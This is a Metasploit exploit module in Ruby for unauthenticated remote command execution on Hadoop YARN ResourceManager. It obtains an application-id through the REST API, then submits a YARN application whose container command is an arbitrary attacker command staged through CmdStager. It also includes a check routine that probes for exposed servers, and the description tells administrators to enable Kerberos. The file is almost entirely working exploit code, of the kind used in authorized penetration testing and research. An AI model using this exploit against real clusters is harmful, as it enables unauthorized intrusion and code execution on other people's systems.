modules/exploits/linux/http/hadoop_unauth_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Hadoop YARN ResourceManager Unauthenticated Command Execution',
'Description' => %q{
This module uses Hadoop's standard ResourceManager REST API to execute arbitrary commands on an unsecured Hadoop server.
Hadoop administrators should enable Kerberos authentication for these endpoints by changing the 'hadoop.security.authentication' setting in 'core-site.xml' from 'simple' (the default) to 'kerberos' before exposing the node to the network.
},
'License' => MSF_LICENSE,
'Author' =>
[
'cbmixx', # Proof of concept
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' =>
[
['URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
['URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn'],
# Note, there will never be a CVE for this issue, since this is a misconfiguration by the administrator rather than a vulnerability in the software.
# Hadoop installations should always configure Kerberos authentication before being exposed to the network,
# since the default configuration does not require authentication.
['URL', 'https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic', {}]
],
'Privileged' => false,
'DisclosureDate' => '2016-10-19',
'DefaultTarget' => 0
))
register_options([Opt::RPORT(8088)])
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
rescue Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
return CheckCode::Unknown
end
if res && res.code == 200 && res.body.include?('application-id')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
print_status('Sending Command')
execute_cmdstager
end
def execute_command(cmd, opts = {})
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
'method' => 'POST'
)
unless res && res.code == 200 && res.body.include?('application-id')
fail_with(Failure::NotFound, 'Could not retrieve application-id')
end
app_id = res.get_json_document['application-id']
post = {
'application-id' => app_id,
'application-name' => Rex::Text.rand_text_alpha_lower(4..12),
'application-type' => 'YARN',
'am-container-spec' => {
'commands' => {'command' => cmd.to_s}
}
}
send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => post.to_json
)
end
end